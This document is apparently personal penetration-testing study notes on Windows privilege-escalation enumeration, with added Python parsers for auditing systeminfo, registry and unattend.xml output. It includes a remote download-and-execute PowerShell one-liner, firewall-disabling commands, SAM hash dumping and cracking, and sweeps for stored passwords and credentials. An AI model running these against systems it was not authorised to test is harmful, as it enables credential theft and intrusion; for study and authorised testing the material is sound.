Windows

Monday, August 17, 2020, 3:12 PM


Enumeration Guides

Windows Privilege Escalation Guide

FuzzySecurity | Windows Privilege Escalation Fundamentals

Windows elevation of privileges

OSCP-note/Windows_commands at master · R0B1NL1N/OSCP-note · GitHub

Local AD Abuse

Retrieve Deleted Items

Get-ADObject -Filter 'isDeleted -eq $true' -IncludeDeletedObjects -Properties *

Remote Script Execution

Use the following to source and execute a file from a remote HTTP server on the local Windows machine:

$webclient=(New-Object Net.WebClient);$webclient.Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;IEX $webclient.DownloadString("http://...")

Privesc Enum Scripts

Sherlock - Run with "Find-AllVulns" to check for MSxxxxx style kernel exploit vulnerabilities.

PowerUp.ps1 - Run with "Invoke-AllChecks" to check for common local privilege escalation misconfigurations (the Windows counterpart of linux-smart-enumeration on Linux).

systeminfo - Save the full systeminfo output to feed into WinPrivescChecker.

Windows Privesc Commands

AV Enumeration

List AV products in PowerShell:

Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntiVirusProduct

To list AV products using WMIC in a CMD prompt:

WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List

Windows System Information

Get Windows Version and Configuration

systeminfo | findstr /B /C:"OS Name" /C:"OS Version"

Extract patches and updates

wmic qfe
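The version and hotfix lines above are what a patch-level checker consumes, and the notes say to feed the full systeminfo output into WinPrivescChecker. The following added example (my code, not from the notes or from any checker tool) parses saved `systeminfo` text into the OS name, build, architecture and installed KB list, and compares that list against a required-patch baseline. The systeminfo text and the KB numbers in it are constructed for this example; the baseline list is a placeholder.

```python
"""Parse saved `systeminfo` output into the fields a patch-level checker needs.

Added example (not from the original notes): turns the text that `systeminfo`
prints into a dict so OS version and installed hotfixes can be compared offline
against a required-patch baseline. The sample output below is constructed for
this example and is not from a real host; the KB numbers in it are made up.
"""
import re

# Constructed sample of the relevant systeminfo lines (real output has many more).
SAMPLE_SYSTEMINFO = """\
Host Name:                 EXAMPLE-WS01
OS Name:                   Microsoft Windows 10 Pro
OS Version:                10.0.19041 N/A Build 19041
OS Manufacturer:           Microsoft Corporation
System Type:               x64-based PC
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: KB4562830
                           [02]: KB4570334
                           [03]: KB4577266
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) Ethernet Connection
"""

# "Key:   value" lines start in column 0; "[NN]: item" continuation lines are indented.
FIELD_RE = re.compile(r"^(?P<key>[A-Za-z][^:]*?):\s*(?P<value>.*)$")
ITEM_RE = re.compile(r"^\s+\[\d+\]:\s*(?P<value>.+?)\s*$")


def parse_systeminfo(text):
    """Return a dict of top-level fields; multi-item fields become lists."""
    info = {}
    current = None
    for line in text.splitlines():
        item = ITEM_RE.match(line)
        if item and current is not None:
            # Continuation line belongs to the previous field; replace the
            # "N Hotfix(s) Installed." summary string with the item list.
            if not isinstance(info[current], list):
                info[current] = []
            info[current].append(item.group("value"))
            continue
        field = FIELD_RE.match(line)
        if field:
            current = field.group("key").strip()
            info[current] = field.group("value").strip()
    return info


def os_summary(info):
    """Pull OS name, build number and architecture out of a parsed dict."""
    build = re.search(r"Build (\d+)", info.get("OS Version", ""))
    system_type = info.get("System Type", "")      # e.g. "x64-based PC"
    return {
        "name": info.get("OS Name", ""),
        "build": int(build.group(1)) if build else None,
        "arch": system_type.split("-based")[0].lower() or None,
    }


def missing_hotfixes(info, required):
    """Return the required KBs that do not appear in the Hotfix(s) list."""
    installed = set(info.get("Hotfix(s)", []))
    return sorted(kb for kb in required if kb not in installed)


if __name__ == "__main__":
    parsed = parse_systeminfo(SAMPLE_SYSTEMINFO)
    print(os_summary(parsed))
    # Placeholder baseline; a real check uses the organisation's required-patch list.
    print("missing:", missing_hotfixes(parsed, ["KB4570334", "KB9999999"]))
```

Run it against a real capture with `systeminfo > sysinfo.txt` and read that file into `parse_systeminfo`; the `Hotfix(s)` list is the same data `wmic qfe` returns, so either source can populate the baseline comparison.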

Get Architecture

wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE%

List all env variables

set

Get-ChildItem Env: | ft Key,Value

List all drives

wmic logicaldisk get caption || fsutil fsinfo drives

wmic logicaldisk get caption,description,providername

Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}| ft Name,Root

User/Group Information

Check user privileges

whoami /priv

Multiple Methods to list all users

net user

whoami /all

Get-LocalUser | ft Name,Enabled,LastLogon

Get-ChildItem C:\Users -Force | select Name

List logon requirements (password and lockout policy); helpful when brute-forcing.

net accounts

Get details about user

net user <username>

List all local groups

net localgroup

Get-LocalGroup | ft Name

Get details about a group

net localgroup administrators

Get-LocalGroupMember Administrators | ft Name, PrincipalSource

Network Enum

List all interfaces, IP info, DNS.

ipconfig /all

Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address

Get-DnsClientServerAddress -AddressFamily IPv4 | ft

List current routing table

route print

Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex

List ARP table

arp -a

Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State

Get current connections

netstat -ano

List firewall info

netsh advfirewall firewall dump

netsh firewall show state

netsh firewall show config

List ports blocked by firewall.

$f=New-Object -ComObject HNetCfg.FwPolicy2;$f.Rules | where {$_.Action -eq "0"} | select Name,ApplicationName,LocalPorts

Disable firewall

netsh firewall set opmode disable

netsh advfirewall set allprofiles state off

List all network shares

net share

View SNMP configuration

reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s

Get-ChildItem -path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse

EoP Enum

SAM/SYSTEM Files

The Security Account Manager (SAM), sometimes called the Security Accounts Manager, is a database file. User passwords are stored in it in hashed form, either as an LM hash or as an NTLM hash. The file is located at %SystemRoot%\System32\config\SAM and is mounted as the registry hive HKLM\SAM.

%SYSTEMROOT% = C:\Windows # Usually
%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM
%SYSTEMROOT%\System32\config\SAM
%SYSTEMROOT%\repair\system
%SYSTEMROOT%\System32\config\SYSTEM
%SYSTEMROOT%\System32\config\RegBack\system

Generate a hash file for John using pwdump or samdump2.

pwdump SYSTEM SAM > /root/sam.txt

samdump2 SYSTEM SAM -o sam.txt

Then crack it with john --format=NT /root/sam.txt.

Search for files contents

cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt

findstr /si password *.xml *.ini *.txt *.config

findstr /spin "password" *.*

Search for file with specific filename

dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*

where /R C:\ user.txt

where /R C:\ *.ini

Search registry for key names and passwords

REG QUERY HKLM /F "password" /t REG_SZ /S /K
REG QUERY HKCU /F "password" /t REG_SZ /S /K

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" # Windows Autologin
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword" 
reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP" # SNMP parameters
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" # PuTTY clear text proxy credentials
reg query "HKCU\Software\ORL\WinVNC3\Password" # VNC credentials
reg query HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password

reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s

Read a value of a certain sub key

REG QUERY "HKLM\Software\Microsoft\FTH" /V RuleList
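The registry queries above (Winlogon autologon, credential-like value names under HKLM/HKCU) produce text that is easier to triage in bulk than by eye. This added example (my code, not from the notes) parses saved `reg query` output and reports two things a defender wants from that data: whether autologon is enabled with a DefaultPassword stored in plain sight, and any value whose name looks credential-like. The output text and the credential values in it are constructed for this example; secrets are masked in the findings.

```python
"""Flag stored credentials in saved `reg query` output.

Added example, not from the original notes: parses the text `reg query` prints
(a key path line, then indented "Name    REG_TYPE    Data" lines) and reports
Winlogon autologon with a plaintext DefaultPassword, plus any value whose name
looks like a credential. The output below is constructed; the values are fake.
"""
import re

# Constructed sample of: reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /s
SAMPLE_REG_OUTPUT = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
    AutoAdminLogon    REG_SZ    1
    DefaultDomainName    REG_SZ    EXAMPLE
    DefaultUserName    REG_SZ    svc_kiosk
    DefaultPassword    REG_SZ    NotARealPassword3
    Shell    REG_SZ    explorer.exe

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions
    (Default)    REG_SZ    Registry
"""

# reg query separates name, type and data with runs of spaces; names may contain single spaces.
VALUE_RE = re.compile(r"^\s{2,}(?P<name>\S+(?: \S+)*)\s{2,}(?P<type>REG_\w+)\s*(?P<data>.*)$")
CRED_NAME_RE = re.compile(r"pass(word|wd)?|pwd|secret|credential", re.IGNORECASE)


def parse_reg_query(text):
    """Return {key_path: {value_name: (type, data)}} for one or more keys."""
    keys = {}
    current = None
    for line in text.splitlines():
        if not line.strip():
            continue
        if not line.startswith(" "):          # unindented line = key path
            current = line.strip()
            keys[current] = {}
            continue
        m = VALUE_RE.match(line)
        if m and current is not None:
            keys[current][m.group("name")] = (m.group("type"), m.group("data").strip())
    return keys


def mask(data):
    """Keep only the first character so a finding is recognisable without exposing the secret."""
    return data[:1] + "*" * (len(data) - 1) if data else ""


def audit_autologon(keys):
    """Return a finding dict if Winlogon autologon keeps its password in the registry."""
    for path, values in keys.items():
        if not path.lower().endswith("\\currentversion\\winlogon"):
            continue
        enabled = values.get("AutoAdminLogon", ("", "0"))[1] == "1"
        pwd = values.get("DefaultPassword")
        if enabled and pwd:
            return {
                "key": path,
                "user": values.get("DefaultUserName", ("", ""))[1],
                "domain": values.get("DefaultDomainName", ("", ""))[1],
                "password": mask(pwd[1]),
            }
    return None


def find_credential_values(keys):
    """List every value whose name looks credential-like, with its data masked."""
    hits = []
    for path, values in keys.items():
        for name, (vtype, data) in values.items():
            if CRED_NAME_RE.search(name):
                hits.append((path, name, vtype, mask(data)))
    return hits


if __name__ == "__main__":
    parsed = parse_reg_query(SAMPLE_REG_OUTPUT)
    print("autologon:", audit_autologon(parsed))
    for hit in find_credential_values(parsed):
        print("credential-like value:", hit)
```

The same parser works on the output of the broader `reg query HKLM /f password /t REG_SZ /s` sweep, since that command prints the same key-path-then-values layout for every key it matches. An autologon finding is the cue to move the password out of DefaultPassword (Windows can hold it as an LSA secret instead) or to disable autologon on that host.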

Passwords can sometimes be found in Unattend.xml / sysprep answer files, stored base64-encoded:

C:\unattend.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\system32\sysprep.inf
C:\Windows\system32\sysprep\sysprep.xml

Locate these files with

dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul
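Once an answer file is located, the question for a defender is whether it still carries credentials. In these files a password element holds a `<Value>` and a `<PlainText>` flag; when PlainText is false, the value is base64 over the UTF-16LE string of the password followed by the element name (for example "Password" or "AdministratorPassword"). The following added example (my code, not from the notes) parses an answer file, decodes that encoding, and reports each credential element with the secret masked. The XML and the passwords in it are constructed for this example.

```python
"""Audit an unattend.xml / sysprep answer file for leftover credentials.

Added example, not part of the original notes: parses an answer file, finds
every element that carries <Value> plus <PlainText>, and reports whether the
value is plaintext or encoded. A non-plaintext value is base64 over the
UTF-16LE string "<password><ElementName>", so the decoder strips that suffix.
The XML below is constructed for this example; the passwords in it are fake.
"""
import base64
import xml.etree.ElementTree as ET

NS = "urn:schemas-microsoft-com:unattend"


def encode_unattend_password(password, tag):
    """Mirror the answer-file encoding: base64(UTF-16LE(password + tag))."""
    return base64.b64encode((password + tag).encode("utf-16-le")).decode("ascii")


# Constructed sample answer file (fake credentials).
SAMPLE_UNATTEND = f"""<?xml version="1.0" encoding="utf-8"?>
<unattend xmlns="{NS}">
  <settings pass="oobeSystem">
    <component name="Microsoft-Windows-Shell-Setup">
      <AutoLogon>
        <Password>
          <Value>{encode_unattend_password("ExamplePass1", "Password")}</Value>
          <PlainText>false</PlainText>
        </Password>
        <Enabled>true</Enabled>
        <Username>Administrator</Username>
      </AutoLogon>
      <UserAccounts>
        <AdministratorPassword>
          <Value>NotARealPassword2</Value>
          <PlainText>true</PlainText>
        </AdministratorPassword>
      </UserAccounts>
    </component>
  </settings>
</unattend>
"""


def local_name(tag):
    """Strip the XML namespace from an element tag."""
    return tag.rsplit("}", 1)[-1]


def decode_unattend_password(value, tag):
    """Decode a non-plaintext answer-file password; returns None if malformed."""
    try:
        text = base64.b64decode(value).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None
    if not text.endswith(tag):
        return None
    return text[: -len(tag)]


def audit_unattend(xml_text):
    """Return one finding per credential element, with the secret masked."""
    findings = []
    for elem in ET.fromstring(xml_text).iter():
        value = elem.find(f"{{{NS}}}Value")
        plain = elem.find(f"{{{NS}}}PlainText")
        if value is None or plain is None:
            continue
        tag = local_name(elem.tag)
        is_plain = (plain.text or "").strip().lower() == "true"
        raw = (value.text or "").strip()
        secret = raw if is_plain else decode_unattend_password(raw, tag)
        findings.append({
            "element": tag,
            "plaintext": is_plain,
            "recoverable": secret is not None,
            "masked": (secret[0] + "*" * (len(secret) - 1)) if secret else None,
        })
    return findings


if __name__ == "__main__":
    for finding in audit_unattend(SAMPLE_UNATTEND):
        print(finding)
```

Point `audit_unattend` at the contents of any of the paths listed above; a finding with `recoverable` set means the file should be removed from the image or its credential section cleared, since the base64 form offers no protection.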

Helpful Bash-like commands

ipconfig == ifconfig == ip a

ipconfig /displaydns

tasklist == ps aux

netstat -na

Further Links

Windows Privilege Escalation